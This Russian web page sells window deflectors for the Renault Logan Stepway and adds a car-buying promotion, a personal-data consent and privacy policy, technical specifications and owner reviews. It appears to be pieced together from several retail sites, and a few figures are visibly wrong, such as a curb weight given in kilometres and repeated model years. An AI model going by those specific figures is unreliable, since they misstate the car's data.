Дефлекторы окон/стекол (ветровики) для рено логан степвей — купить на локотник.ру
Цена за весь комплект (4 шт): 1580 рублей. В наличии!
Материал: качественное немецкое литьевое оргстекло Plexiglass.
Средняя ширина: 75 мм.
Особенности:
Наши ветровики изготовлены индивидуально для автомобиля Рено Логан 2 Степвей, под размеры оконных арок именно этого автомобиля. Подходят для Renault Logan 2 Stepway любых годов выпуска.
Дефлекторы на окна позволят вам приоткрыть окна вашего автомобиля в дождь и снег — при этом защитят салон вашего автомобиля от попадания влаги и осадков. Более того, установленные дефлекторы препятствуют загрязнению стекол — работают как козырек.
Они выполняют не только защитную, но и декоративную функции: качественное, темное, полупрозрачно-тонированное литьевое оргстекло украсит экстерьер вашего автомобиля.
Дверные дефлекторы крайне просто устанавливаются с помощью качественного двухстороннего скотча, который уже нанесён на обратную сторону изделия — ничего сверлить не нужно, а установка займет не более 10-15 минут. В случае демонтажа — они не оставляют следов.
Материал ветровиков — литьевое ПММА (оргстекло) — легко переносит перепады температуры, не теряя при этом прочности и круглый год сохраняет отличную устойчивость к механическим повреждениям.
Подходит для годов выпуска:
2021, 2021, 2020, 2021.
Гарантии:
Оплата при получении. 14 дней на возврат денежных средств по любой причине. Год гарантии на изделие.
Доставка:
Почта России с оплатой при получении или со скидкой по предоплате.
Транспортная компания СДЭК.
Характеристики:
— Качественный двухсторонний скотч 3М — надежное крепление с повышенной адгезией.
— Литьевое оргстекло отлично переносит перепады температуры и обладает отличной устойчивостью к механическим повреждениям.
— Защитят от осадков и не помешают обзору.
— 4 штуки в комплекте.
Как выгодно купить логан степвей в столице?
Чтобы ознакомиться с самыми актуальными предложениями Logan Stepway от официальных дилеров в Москве, следует воспользоваться сервисом Autospot. Клиент получает ряд преимуществ:
- страховка КАСКО от 3,5% – бесплатный технический ремонт в официальном дилерском центре, при котором используются только оригинальные детали;
- гарантия сроком на 3 года или 100000 км, которая распространяется на все новые машины;
- программа помощи на дороге с возможностью экстренного вызова ремонтной группы;
- возможность приобретения машины в кредит по ставке от 4,9% годовых.
Каждый может купить Рено Логан Степвей по цене от официального дилера. При подтверждении покупки через сайт можно пройти бесплатную диагностику авто в мастерской «Вилгуд», а при необходимости – провести плановый ремонт со скидкой 10%. Также предусмотрены услуга сезонного хранения резины и ряд шиномонтажных работ по цене от 2576 рублей (на 20% дешевле).
Купить модель Рено Логан Степвей по выгодной цене можно с помощью удобного каталога Autospot. На сайте можно сравнить между собой несколько предложений от автосалонов в разных городах, узнать об актуальных акциях и дополнительных бонусах. Для поиска лучшей цены можно оставить заявку.
Подбор по авто. шины и диски для renault logan stepway 2021 года выпуска
Настоящим я выражаю свое согласие ООО «Пауэр Интернэшнл–шины» (ОГРН
1027739435570, ИНН 7703247653) при оформлении Заказа товара/услуги на сайте
www.newlogan.ru в целях
заключения и исполнения договора купли-продажи обрабатывать — собирать,
записывать, систематизировать, накапливать, хранить, уточнять (обновлять,
изменять), извлекать, использовать, передавать (в том числе поручать
обработку другим лицам), обезличивать, блокировать, удалять, уничтожать —
мои персональные данные: фамилию, имя, номера домашнего и мобильного
телефонов, адрес электронной почты.
Также я разрешаю ООО «Пауэр Интернэшнл–шины» направлять мне сообщения
информационного характера о товарах и услугах ООО «Пауэр Интернэшнл–шины»,
а также о партнерах.
Согласие может быть отозвано мной в любой момент путем направления ООО
«Пауэр Интернэшнл–шины» письменного уведомления по адресу: 129337, г.
Москва, ул. Красная Сосна, д.30
Конфиденциальность персональной информации
1. Предоставление информации Клиентом:
1.1. При оформлении Заказ товара/услуги на сайте www.newlogan.ru (далее —
«Сайт») Клиент предоставляет следующую информацию:
— Фамилию, Имя, Отчество получателя Заказа товара/услуги;
— адрес электронной почты;
— номер контактного телефона;
— адрес доставки Заказа (по желанию Клиента).
1.2. Предоставляя свои персональные данные, Клиент соглашается на их
обработку (вплоть до отзыва Клиентом своего согласия на обработку его
персональных данных) компанией ООО «Пауэр Интернэшнл–шины» (далее –
«Продавец»), в целях исполнения Продавцом и/или его партнерами своих
обязательств перед Клиентом, продажи товаров и предоставления услуг,
предоставления справочной информации, а также в целях продвижения товаров,
работ и услуг, а также соглашается на получение информационных сообщений.
При обработке персональных данных Клиента Продавец руководствуется
Федеральным законом «О персональных данных» и локальными нормативными
документами.
1.2.1. Если Клиент желает уничтожения его персональных данных в случае,
если персональные данные являются неполными, устаревшими, неточными, либо в
случае желания Клиента отозвать свое согласие на обработку персональных
данных или устранения неправомерных действий ООО «Пауэр Интернэшнл–шины» в
отношении его персональных данных, то он должен направить официальный
запрос Продавцу по адресу: 129337, г. Москва, ул. Красная Сосна, д.30
1.3. Использование информации предоставленной Клиентом и получаемой
Продавцом.
1.3.1 Продавец использует предоставленные Клиентом данные в целях:
· обработки Заказов Клиента и для выполнения своих обязательств перед
Клиентом;
- для осуществления деятельности по продвижению товаров и услуг;
- оценки и анализа работы Сайта;
- определения победителя в акциях, проводимых Продавцом;
· анализа покупательских особенностей Клиента и предоставления персональных
рекомендаций;
· информирования клиента об акциях, скидках и специальных предложениях
посредством электронных и СМС-рассылок.
1.3.2. Продавец вправе направлять Клиенту сообщения информационного
характера. Информационными сообщениями являются направляемые на адрес
электронной почты, указанный при Заказе на Сайте, а также посредством
смс-сообщений и/или push-уведомлений и через Службу по работе с клиентами
на номер телефона, указанный при оформлении Заказа, о состоянии Заказа,
товарах в корзине Клиента.
2. Предоставление и передача информации, полученной Продавцом:
2.1. Продавец обязуется не передавать полученную от Клиента информацию
третьим лицам. Не считается нарушением предоставление Продавцом информации
агентам и третьим лицам, действующим на основании договора с Продавцом, для
исполнения обязательств перед Клиентом и только в рамках договоров. Не
считается нарушением настоящего пункта передача Продавцом третьим лицам
данных о Клиенте в обезличенной форме в целях оценки и анализа работы
Сайта, анализа покупательских особенностей Клиента и предоставления
персональных рекомендаций.
2.2. Не считается нарушением обязательств передача информации в
соответствии с обоснованными и применимыми требованиями законодательства
Российской Федерации.
2.3. Продавец получает информацию об ip-адресе посетителя Сайта
www.newlogan.ru и сведения о том, по ссылке с какого интернет-сайта
посетитель пришел. Данная информация не используется для установления
личности посетителя.
2.4. Продавец не несет ответственности за сведения, предоставленные
Клиентом на Сайте в общедоступной форме.
2.5. Продавец при обработке персональных данных принимает необходимые и
достаточные организационные и технические меры для защиты персональных
данных от неправомерного доступа к ним, а также от иных неправомерных
действий в отношении персональных данных.
Технические характеристики
Новый кузов Рено Логан Степвей 2021 года построен на базе переднеприводной «тележки» M0, для которой характерно поперечное расположение силового агрегата и кузов, изготовленный с широким применением высокопрочных сортов стали.
Спереди на французском седане используется независимая подвеска типа МакФерсон, а сзади — полузависимая конструкция с торсионной балкой. Дополнительно «по кругу» установлены амортизаторы и стабилизаторы поперечной устойчивости. Передним колесам четырехдверки достались дисковые тормоза, а вот задним — более доступные барабанные механизмы. Renault Logan Stepway имеет следующие габаритные размеры, мм:
- Длина — 4 359
- Ширина — 1 733
- Высота — 1 517
- Колесная база — 2 634
- Дорожный просвет (клиренс) — 195
Объем багажника четырехдверки равен 510 литра. Модели положен 50-литровый топливный бак, а ее снаряженная масса варьируется в диапазоне от 1 106 до 1 156 км (в зависимости от выбранного двигателя / комплектации). Линейка силовых агрегатов Рено Логан Степвей состоит из трех 1,6-литровых бензиновых моторов, которые могут работать с механикой, автоматом и вариатором.
- Начальным версиям седана полагается двигатель K7M. Работая в тандеме с пятиступенчатой механикой, его отдача составляет 82 л.с. и 134 Нм. С места до сотни такой автомобиль разгоняется за 13,9 секунды, развивая скорость вплоть до 163 километров в час.
- В качестве альтернативы Logan Stepway можно заказать с мотором K4M мощностью 102 сил (145 Нм), в связке с которым трудится четырехскоростной автомат. В данном случае разгон с 0-100 км/ч возможен за 11,7 сек, а максимальная скорость достигает 171 км/ч.
- Плюс для машины доступен двигатель H4M на 113 сил и 152 Нм момента. Данный агрегат может работать как механикой, так и с вариатором. Варианту с МКПП по силам ускориться с 0-100 км/ч за 10,7 сек, а его скоростной лимит — 177 км/ч. Машина с CVT несколько медленнее — 12,1 сек и 170 км/ч соответственно.
Подвеска приподнятого Рено Логан Степвей 2021 повышенной проходимости настроена чуть жестче обычного Logan, поэтому перед крупными дорожными неровностями (например, «лежачими полицейскими») скорость лучше сбрасывать, иначе автомобиль взбрыкнет, заставив задних пассажиров подпрыгнуть на сиденьях.
В свою очередь увеличенный клиренс ( 40) сделал поведение машины при активной езде несколько вальяжным. В частности, автомобиль стал сильнее крениться в поворотах и чуть медленнее откликаться на рулежку. Из плюсов — теперь «француз» неплохо чувствует себя на грунтовке: увеличенные ходы подвески сглаживают ямы и бугры, при этом пробоев не наблюдается даже при проезде наиболее сложных участков.
Передние сиденья в салоне нового Рено Логан Степвей идут с короткой подушкой и такие же аморфные, как и на обычном седане, однако сама посадка здесь заметно выше, за счет чего обзорность несколько лучше. Второй ряд достаточно просторен, однако каких-либо удобств для задних пассажиров (вроде откидного подлокотника или отдельных дефлекторов вентиляции) не предусмотрено.
Что касается эргономики, то она в Logan Stepway на уровне обычного варианта модели, а значит все «фирменные» просчеты на месте. К примеру, руль седана по-прежнему имеет регулировку только по наклону, а блок климат-контроля с клавишами подогрева передних сидений все также находятся в «слепой» зоне. Плюс огорчить водителей может и чересчур пестрое оформление приборной панели.
Отзывы владельцев renault logan stepway
Движка 1.6 хватает с лихвой, даже с запасом бы сказал. По трассе обгонял в основном на пятой. Машина идет достаточно бодро. Если не гнать и легонько прижимать газ, то расход 5.8, а так в среднем по трассе 6.5.
Съезжал на пересеченные дороги — приятно было ощущать, что есть запас по дорожному просвету. Масложора вроде нет. Показалось, что за 6 000 км может на 1-2 мм уровень упал. В общем, машина за эти деньги просто супер, приемистая, комфортная, руль клевый, выглядит хорошо.
Отзыв о Renault Logan Stepway 1.6 (113 л.с.) МКПП 2020 г.в.
Минусы нового Рено Логна Степвей — плохая шумоизоляция арок и днища. Высокий расход — зимой высвечивает 12,5 литров, летом 10,5-11,5 в городском цикле. Денежные расходы на бензин в среднем выросли на 15-20%, по сравнению с моей прежней Лада Веста. Неудобная кнопка отпирания багажника, контуры дверей плохо «прорезинены», нет пластиковых накладок на порогах внутри салона, неудобные передние сидения.
Штатный автозапуск — ерунда, а именно — нет обратной свзяи, пытается заводить только до -25, дальность действия очень мала (если есть помехи, то и с 10 метров не реагирует), также отмечу, что напольное покрытие тоненькое и низкого качества — не держит тепло, АКПП не хватает пятой передачи на трассе.
Отзыв про Рено Логан Степвей 1.6 (102 л.с.) на автомате 2021
Клиренс — 195 мм, так что парковаться к бордюрам можно без опаски. Но на машине с вариатором штатно установлена стальная защита силового блока, под защитой осталось 170 мм (сам не мерил, данные из интернета). Мне кажется, этого все равно вполне хватает для езды по плохим дорогам и дворам.
Связка двигатель-вариатор — отличная, машина едет очень хорошо. Пока ни в одной ситуации не было ощущения, что не хватает мощности. Выехать с заправки и встроиться в поток, обогнать на трассе, увеличить скорость на подъеме — без проблем.
Руль — удобный. Расположение кнопок на руле — неудобное. Комбинация приборов — неудобная, надо привыкать. Главный для меня недостаток — я плохо вижу показания спидометра. Расположение всяких кнопок — не всегда логичное, даже странное.
Отзыв о новом Логан Степвей 1.6 (113 л.с.) с вариатором 2020
По ходовой части прет как танк. Машина идет мягко, устойчиво, ездил и 150, и 180 — дорогу держит, но золотая середина для него 110-120 по трассе. Если ехать быстрее — коробка автомат начинает гудеть, не хватает 5 той. Сам по себе автомат надежный, старый, проверенный временем, переключает передачи плавно, без рывков. Понравилась новая оптика, дает мощный свет. Двигатель 16 кл надежный чугунный блок, с большим ресурсом работы. Новый руль смотрится на ура.
Теперь из минусов: первый с которым я столкнулся — это обогрев ног, их старую болячку так и не устранили. Дальше начала бесить шумоизоляция — ее здесь практически нет: ни в дверях, ни в кузове, едешь и в салоне свист. Обогрев лобового стекла вещь хорошая, но дворники находятся ниже зоны обогрева, когда включаешь — все тает и стекает на них, и они замерзают и не включаются. Еще плохо, что на панели приборов не показывает температуру охлаждающей жидкости.
Отзыв о новом Renault Logan Stepway 1.6 (102 л.с.) АКПП 2021
Из минусов отмечу вой коробки. Он был на прошлом Логане на первой передаче, здесь он есть на всех, вплоть до третьей — это просто нонсенс, воет, как троллейбус. Качество сборки все-таки хуже, чем на предыдущем поколении. Расход топлива высоковат — у меня по компьютеру выходит порядка 11-13 литров (средняя скорость 30-35).
Странная работа подвески — чтобы более-менее безболезненно проехать очередное такое препятствие, нужно сбросить скорость практически до нуля, в противном случае происходит крайне жесткий, неприятный, громкий отстрел. Также сильно раздражает электронная педаль газа — проявляется это в задержке реакции на нажатие педали.
Отзыв о Рено Логан Степвей 1.6 (113 л.с.) на механике 2020 года